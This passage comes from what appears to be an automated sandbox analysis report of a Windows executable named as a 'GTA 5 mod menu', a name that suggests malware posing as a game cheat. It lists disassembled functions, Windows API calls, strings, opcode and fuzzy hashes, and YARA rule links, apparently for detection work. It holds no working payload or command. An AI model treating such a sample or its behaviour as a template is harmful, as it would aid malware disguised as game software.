GetACP.KERNEL32(?,?,00F9AB2D,?,00000000), ref: 00F9B24E

Strings

OCP, xrefs: 00F9B1CB
ACP, xrefs: 00F9B195

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
Instruction ID: 9203ef6fc9630091ae59231822bb246e077fe8d5dff5f75cc10b9de42de5c01d
Opcode Fuzzy Hash: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
Instruction Fuzzy Hash: ED21D622E04100A6FF358F55EA00BAB73A7EF90B30B564424E90AD7104E732DD80F350

Function 00F9A9F7 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00F9AAFF
IsValidCodePage.KERNEL32(00000000), ref: 00F9AB3D
IsValidLocale.KERNEL32(?,00000001), ref: 00F9AB50
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9AB98
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9ABB3

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
Instruction ID: 87f2566d22180582d4e9b9397b96ef545291b36812a556565798de6efd7a2706
Opcode Fuzzy Hash: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
Instruction Fuzzy Hash: 755180B2E00219ABFF14DFA4CC85AAA73B9FF44710F144465E911E7190E774DA44EBA2

Function 00F93400 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: a0f2cbffd4b291ccbac7c0b20493b91d22184ccd65307a441dcd2bc566bb258b
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: C0021DB1E012199BEF14CFA9C9806AEB7F1FF48324F258269E519E7341D731AE41DB90

Function 00F9B759 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 204bcad8e864d67479c4a1b42e46905535ecdae3f112ec2e005526035e935b2c
Instruction ID: f480687b8eecaea44ac7f4016663f439985fa210b6d0a42a61e1c3fc9f68d6b3
Opcode Fuzzy Hash: 204bcad8e864d67479c4a1b42e46905535ecdae3f112ec2e005526035e935b2c
Instruction Fuzzy Hash: F971F3B1D0516C5FEF21AF68ED99AAAB7B8EF45310F5442D9E00893211DB358E84AF10

Function 00F89A33 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F89A3F
IsDebuggerPresent.KERNEL32 ref: 00F89B0B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F89B24
UnhandledExceptionFilter.KERNEL32(?), ref: 00F89B2E

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
Instruction ID: 7e6580cbea56c330b3bf21ad066cd137d0fb22212a913af97cadc37d97eeed3a
Opcode Fuzzy Hash: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
Instruction Fuzzy Hash: E231F9B5D0521D9BDB61EF64DD497CDBBB8AF08300F1041AAE40CAB250E7B49A849F45

Function 00F81C10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00F81C3B
GetFileSize.KERNEL32 ref: 00F81CC3
CloseHandle.KERNEL32 ref: 00F81CDF

Strings

CreateFileA, xrefs: 00F81C2E

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AddressCloseFileHandleProcSize
String ID: CreateFileA
API String ID: 2836222988-1429953656
Opcode ID: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
Instruction ID: 852fbb8ee6ba40f2327faa3b6b20eeeb886fb59715bb8ffa4edb3fe3267f904e
Opcode Fuzzy Hash: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
Instruction Fuzzy Hash: EF41A5B1D082099FCB00EFA8D49879EBBF0BF49314F008529E899A7350D7789945DF92

Function 00FA4192 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00FA417D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00FA4238
__alloca_probe_16.LIBCMT ref: 00FA42F3
__alloca_probe_16.LIBCMT ref: 00FA4382
__freea.LIBCMT ref: 00FA43CD
__freea.LIBCMT ref: 00FA43D3
__freea.LIBCMT ref: 00FA4409
__freea.LIBCMT ref: 00FA440F
__freea.LIBCMT ref: 00FA441F

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
Instruction ID: 7d5ed09f621ddf01f2c461627fdd4c1691ca26db63c999399dfc9e8222e6835d
Opcode Fuzzy Hash: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
Instruction Fuzzy Hash: 3B7184B2D042099BDF21AE948C81BAE77F59F8B720F280059FD04A7281D7F5AC41B760

Function 00F98576 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F985FC

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 6f67d6a2429b463f6e75f03fba0b3a9068bfac505b5086a5cc38bdd6ebe5b726
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: 5AB17972D003959FFF118F64CC81BAE7BA5EF563A0F284155E904AF282DA78DC02D7A1

Function 00F8AB70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F8ABA7
___except_validate_context_record.LIBVCRUNTIME ref: 00F8ABAF
_ValidateLocalCookies.LIBCMT ref: 00F8AC38
__IsNonwritableInCurrentImage.LIBCMT ref: 00F8AC63
_ValidateLocalCookies.LIBCMT ref: 00F8ACB8

Strings

csm, xrefs: 00F8AC4D

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
Instruction ID: d5b55b0b8cb1552bb51935a115e20e61b6a0fea8e574afa80352531ecc35bdf4
Opcode Fuzzy Hash: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
Instruction Fuzzy Hash: A541E434E006189BDF11EF68CC80ADEBBA5FF46324F148156E8159B352D739EA01EF92

Function 00F96602 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00F96711,00000000,00000000,00000000,00000000), ref: 00F966C3

Strings

api-ms-, xrefs: 00F96659
ext-ms-, xrefs: 00F9666D

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
Instruction ID: 97e9d84ae089510a5c08ec6ba82b14b9eb0c227958f019faed2653b44d70f808
Opcode Fuzzy Hash: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
Instruction Fuzzy Hash: 5521E772E01219ABEF319B659C44A5B3768AB467B0F250214FD05EB290EB74ED00FAD1

Function 00FA2E5C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc2c4feda10354afef45c8a710f99b410288491cf7ff8df987d2729a0a52c4b
Instruction ID: 91c069a3b2c4bd251f775bd82e6405f913a325666f0f3183bfd9b49db4c83746
Opcode Fuzzy Hash: ffc2c4feda10354afef45c8a710f99b410288491cf7ff8df987d2729a0a52c4b
Instruction Fuzzy Hash: E3B1D2B5E0424AAFEF11DFA9CC81BAEBBB1BF46314F144158F40197292C7759E41EBA0

Function 00F9442D Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F94424,00F8A93D,00F89B94), ref: 00F9443B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F94449
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F94462
SetLastError.KERNEL32(00000000,00F94424,00F8A93D,00F89B94), ref: 00F944B4

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
Instruction ID: 49382c49d4f6112997bfa1b71997e8f701cff1eade1f30c6105a9ea15005266a
Opcode Fuzzy Hash: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
Instruction Fuzzy Hash: 0801D43350A71A6EBF256A79BCC5E2B3684EB61775720033AFD10951E1EF159C027640

Function 00F94D0C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F94E2B
CallUnexpected.LIBVCRUNTIME ref: 00F950A4

Strings

csm, xrefs: 00F94D49
csm, xrefs: 00F94DB6
csm, xrefs: 00F94E62

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
Instruction ID: 8e1b621ca649cef9029f0863a6ef52fe32879a76698721b42964529bdb798b96
Opcode Fuzzy Hash: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
Instruction Fuzzy Hash: 3DB18E71C0020ADFEF25EFA4C841DAEB7B5BF24310B14456AE9156B212D335EA52EF91

Function 00F8F1B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1ED
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1FF
FreeLibrary.KERNEL32(00000000,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F221

Strings

CorExitProcess, xrefs: 00F8F1F7
mscoree.dll, xrefs: 00F8F1E6

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
Instruction ID: f36bc089717ac345db1de9b5ae15ef30cd40ac21a63e2d25e8d9785aba7ace64
Opcode Fuzzy Hash: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
Instruction Fuzzy Hash: 5A01A2B594061DAFDB119F50DC49FEEBBF8FB05B21F000625E811E22D0DB789900EB90

Function 00F96DEA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00F96E6F
__alloca_probe_16.LIBCMT ref: 00F96F38
__freea.LIBCMT ref: 00F96F9F

Part of subcall function 00F956B1: HeapAlloc.KERNEL32(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3

__freea.LIBCMT ref: 00F96FB2
__freea.LIBCMT ref: 00F96FBF

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
Instruction ID: 4769d611c48bb634048a6d65c61e5afc0289393d879ea464a069f123c62d78a4
Opcode Fuzzy Hash: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
Instruction Fuzzy Hash: 195197729002066FFF219E65EC45EBB76A9DF44728F150129FD08D6241FB75DC10B7A0

Function 00F877B2 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00F877B9
std::_Lockit::_Lockit.LIBCPMT ref: 00F877C4
std::_Lockit::~_Lockit.LIBCPMT ref: 00F87832

Part of subcall function 00F876AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F876C7

std::locale::_Setgloballocale.LIBCPMT ref: 00F877DF
_Yarn.LIBCPMT ref: 00F877F5

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
Instruction ID: 5f04daa246362c1e49661ae77f31e37cde3b2c594a63e0848c4e07d747094a87
Opcode Fuzzy Hash: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
Instruction Fuzzy Hash: E601BCB5A142148BC706FF20CC956BDBBA1BFC5350B284109E80257382CF38AE02EBD1

Function 00F9F670 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC), ref: 00F9F67D
GetLastError.KERNEL32(?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC,00000000,?,00F9535C), ref: 00F9F687
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F9F6AF

Strings

api-ms-, xrefs: 00F9F694

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
Instruction ID: e6596e05a9302da43d67098b527185de99e0bdd205619c727939c85c7b77bc18
Opcode Fuzzy Hash: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
Instruction Fuzzy Hash: 30E04F71B8430DB7FF201B60EC0AB693F559B11B62F544430F90CE84F1EBA6E854B945

Function 00F9D70E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00F9D771

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D9C3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F9DA09
GetLastError.KERNEL32 ref: 00F9DAAC

Memory Dump Source

Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
